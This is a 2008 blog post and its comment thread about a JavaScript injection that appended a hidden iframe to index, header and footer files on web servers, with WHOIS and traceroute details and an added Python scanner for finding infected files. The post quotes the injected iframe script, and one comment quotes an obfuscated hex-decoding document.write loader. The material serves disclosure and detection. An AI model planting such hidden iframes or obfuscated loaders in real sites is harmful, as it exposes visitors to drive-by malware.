Just discovered this by accident. My server files have been infected with a piece of JavaScript code that sends information to a certain site. This is certainly a first.

How can you check this?

The virus attacks the following files on your server:

  • index.php
  • index.html
  • main.php
  • header.php
  • footer.php

At the end of these files it will insert the following code:

<script language=javascript>status=location;document.write('<iframe src="hххp://online-channels.info/in.cgi?traf" width=0 height=0 frameborder=0 display:none onLoad="status=defaultStatus;"></iframe>');</script>

Update: if you use WordPress, read how to check WordPress sites.

What does it do?

I can only guess. The code calls a script on the online-channels.info site. It could be sending traffic information. Maybe it is the first case of Internet marketing espionage? Or it could be trying to run some malicious code.

How did it get here?

It could be a security flaw on my hosting server, or a security flaw in WordPress, which is the main script I run on my server.

Whichever way it came in, it executed code that scanned through all the files on my server matching the given names and appended that code to the end of each one.

All the affected files carry the time stamp 29-06-2008 04:59, which is the time when the attack occurred.

How did I discover it?

By accident. I was looking at the HTTP requests on my site using Firebug. I noticed a few 404 Object Not Found errors. Normally I keep my blog in good shape and these things should not happen.


I then suspected that some of the plugins I use reference this site. After inspection I found the script inserted into a number of plugins.

I then checked my theme: it was there too, in the index, header and footer. I then checked the whole WordPress installation, and the script was there as well.

Finally I discovered it was spread out on my whole server.

The lucky thing is that the attacker's site went down, so the 404 error gave away the anomaly.

Who is behind it?

I am still not sure. Here is the domain registration record for online-channels.info:

Domain ID:D23976304-LRMS
Domain Name:ONLINE-CHANNELS.INFO
Created On:29-Feb-2008 23:08:51 UTC
Last Updated On:22-Jun-2008 11:24:52 UTC
Expiration Date:28-Feb-2009 23:08:51 UTC
Sponsoring Registrar:Blog.com Digital Communications Inc. (R315-LRMS)
Status:OK
Registrant ID:PP-SP-001
Registrant Name:Domain Admin
Registrant Organization:PrivacyProtect.org
Registrant Street1:P.O. Box 97
Registrant Street2:Note - All Postal Mails Rejected, visit Privacyprotect.org
Registrant Street3:
Registrant City:Moergestel
Registrant State/Province:
Registrant Postal Code:5066 ZH
Registrant Country:NL
Registrant Phone:+45.36946676

The site is registered somewhere in Denmark under an anonymous name. Blog.com is listed as the Sponsoring Registrar.

The server IP is 78.109.22.246 and is located in Ukraine.

A traceroute times out before reaching the site:

11    86 ms    83 ms    83 ms  tr1-v23.de-fra.datagroup.ua [217.28.250.42]
12   114 ms   107 ms   107 ms  tr1-v454.ua-kiev.datagroup.ua [80.91.160.205]
13   691 ms   611 ms   131 ms  cat65-ge1-2-datagroup.hosting.ua [194.54.91.130]
14     *        *        *     Request timed out.

What can I do?

You should check the files on your server for the code. Check index.php and index.html first, as they are the most likely to have been infected.
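A defender-side checker for that job, added here as an example and not part of the original post: it walks a web root, looks only at the file names listed above, and flags both the plain iframe variant from this post and the hex-obfuscated document.write() variant a commenter quotes further down (comment 9). The sample files, the example.invalid placeholder and the variable names are constructed for the demo; the URL is defanged the same way the post defangs it.

```python
import os, re, tempfile, time

# Files the post says the injection targets (lower-cased: a commenter saw "Index.php").
TARGET_NAMES = {"index.php", "index.html", "main.php", "header.php", "footer.php"}
# Plain variant from the post: a <script> whose iframe points at online-channels.info/in.cgi?traf.
IFRAME_RE = re.compile(r"<script[^>]*>.*?online-channels\.info/in\.cgi\?traf.*?</script>", re.I | re.S)
# Obfuscated variant quoted in comment 9: a long hex string decoded and passed to document.write().
HEX_RE = re.compile(r"var\s+\w+\s*=\s*'([0-9a-fA-F]{40,})'\s*;\s*document\.write\(")

def decode_hex_pairs(blob):
    """Mirror the commenter's decoder: every two hex digits become one character code."""
    return "".join(chr(int(blob[i:i + 2], 16)) for i in range(0, len(blob), 2))

def find_injection(text):
    """Return ("iframe", matched script) or ("hex", decoded payload); None when clean."""
    m = IFRAME_RE.search(text)
    if m:
        return ("iframe", m.group(0))
    m = HEX_RE.search(text)
    return ("hex", decode_hex_pairs(m.group(1))) if m else None

def scan_tree(root):
    """Walk root and report (path, kind, mtime, payload) for every infected target file."""
    findings = []
    for dirpath, _dirs, files in os.walk(root):
        for name in files:
            if name.lower() not in TARGET_NAMES:
                continue
            path = os.path.join(dirpath, name)
            with open(path, encoding="utf-8", errors="replace") as fh:
                hit = find_injection(fh.read())
            if hit:  # the mtime is what let the post date the attack to 29-06-2008 04:59
                findings.append((path, hit[0], time.ctime(os.path.getmtime(path)), hit[1]))
    return findings

# Constructed samples, not captures: the post's iframe (URL defanged as in the post) and a hex blob hiding a placeholder.
SAMPLE_IFRAME = ("<script language=javascript>status=location;document.write('<iframe "
                 "src=\"hххp://online-channels.info/in.cgi?traf\" width=0 height=0></iframe>');</script>")
HIDDEN = '<iframe src="http://example.invalid/in.cgi" width=0 height=0></iframe>'
SAMPLE_HEX = "".join(f"{ord(c):02x}" for c in HIDDEN)
SAMPLE_OBFUSCATED = f"var q1='{SAMPLE_HEX}';document.write(dec(q1));"

def demo():
    root = tempfile.mkdtemp()  # throwaway web root: one infected, one obfuscated, one clean file
    for rel, body in {"index.php": "<?php echo 'home'; ?>\n" + SAMPLE_IFRAME,
                      "index.html": "<html></html>\n<script>" + SAMPLE_OBFUSCATED + "</script>",
                      "main.php": "<?php echo 'clean'; ?>\n"}.items():
        with open(os.path.join(root, rel), "w", encoding="utf-8") as fh:
            fh.write(body)
    return scan_tree(root)
```

Point `scan_tree()` at the real document root instead of the demo directory; a match's mtime tells you when the injection happened, and the decoded payload tells you where the hidden iframe points.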

Warn your friends about it.

28 Responses to “Check your website for virus attack !”

  1. Hi, I'm lost. I have a few questions; is there anybody I can email my questions to one-to-one?
    Thank you for your time.
    Ter

  2. not working…

    http://dhost.info/hasan

  3. Well, some pages worked but when I went to HOME - several times,(http://www.prelovac.com/vladimir/) this is what I’ve got (no joke)! Or you think I’m fooling you around?!

  4. How did you write that comment then? :)

  5. Oops… where is the hyperlink to the image? Never mind, it’s here:

    http://i281.photobucket.com/al.....screen.jpg

  6. It seems that you still have some problems?! Look what I’ve got when browsing your website:

  7. thanks for the information.

    hope this help in my problem…

    My site got infected with (Exploit.HTML.Iframe.FileDownload).
    How to identify the file that has been infected? On my site, there are 3 index.html files in separate folders.

  8. Okay, wanted to add this.
    I noticed that the injection infects the main folder of the server, and goes one directory deep to infect another file.
    /index.html
    and
    foldername/index.html
    but won't go deeper than that. Good for me, since many folders have indexes in deep folders.

    In the future I plan not to have index files in the first sub folder if this keeps up.

    What hosting provider do you all use?

  9. I noticed on my 2 servers, both hosted on GoDaddy, that all my files titled Index.php or .html, main, login have been affected by a code injection. To compare notes, here is what mine reads..

    I removed script start and end from the copy and paste.
    I hope this helps someone out there. Oh, 1 server runs Joomla on it. The other runs HTML and PHP scripts.

    function xy1q48773ca845b80(q48773ca846354){ function q48773ca846b1f () {var q48773ca8472ee=16; return q48773ca8472ee;} return (parseInt(q48773ca846354,q48773ca846b1f()));}function q48773ca847abe(q48773ca8484a8){ var q48773ca8499fc=2; var q48773ca848a5e='';q48773ca84a99e=String.fromCharCode;for(q48773ca84922d=0;q48773ca84922d<q48773ca8484a8.length;q48773ca84922d+=q48773ca8499fc){ q48773ca848a5e+=(q48773ca84a99e(xy1q48773ca845b80(q48773ca8484a8.substr(q48773ca84922d,q48773ca8499fc))));}return q48773ca848a5e;} var q48773ca84b16e='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';document.write(q48773ca847abe(q48773ca84b16e));

  10. Using the .htm suffix instead of .html does not stop anything.

  11. I'm seeing this on a Joomla site

  12. I maintain my business website and have a similar virus. I use a commercial host who denies any virus on my website.
    Nearly all of the index.html and index.php have the added code. The code is different from the one shown here. This code has a long string of numbers in it.
    I would like to ask if anyone has had success using just the index.htm ?
    I am going to replace some of my index files with that extension since some files I cleaned and replaced online were reinfected.

    Thanks, for all the information put on this page.

    I may let you know if changing the html to htm works.

  13. Dave (The Other One) - love that redirect and I totally agree that they need what that page is offering!!

  14. Hi, thanks for the info. I would like to contribute info regarding the Registrar - Blog.com.

    Almost all new .info domains with Directi (ResellerClub) show the Sponsoring Registrar as Blog.com.

    I have blogged on my site on this if interested. http://indika.info/2008/07/15/.....o-blogcom/

  15. I have WordPress 2.5.1 installed. I tried replacing the index files (in root, wp-admin, and deleted all of my themes in wp-content and recreated them new) and that seemed to be doing the trick…

    Until this morning, when it came back again. All the index.php files have been injected again with the script, so I will have to do the same thing. Is there any way to prevent modifications to the index.php files? I changed the permissions on those files to 644, but I'm not sure if this is going to fix it permanently.

  16. Is this website (www.priceclub.ae) infected by a virus…?
    Please tell me whether the website is infected by a virus or not…

    pleaseeeeeeeee.

    thanks,
    DHrub

  17. Removing them from the files is what I did; nothing much left, I am afraid, except contacting your hosting company and warning them. Also make sure you upgrade everything to the latest versions (WordPress especially).

  18. Hi there, I stumbled upon your site from googling. It seems my website was also injected with these files, although so far I only found them in the 3 index.php files located in the WordPress directory.

    I was wondering what I should do in this case. If I download those 3 index.php files, remove the scripts and upload them back, will it actually solve the problem? I've been looking around and it seems they get injected back within a day. I also wanted to change the password on all my accounts, but I don't know if that is going to solve anything.

    Any of you have any ideas? Thanks for the heads up definitely.

Trackbacks/Pingbacks

  1. Check your WordPress site for viruses and malware
  2. Hacked! Supposed attack site. | Ethan W. Brown : //etano.net
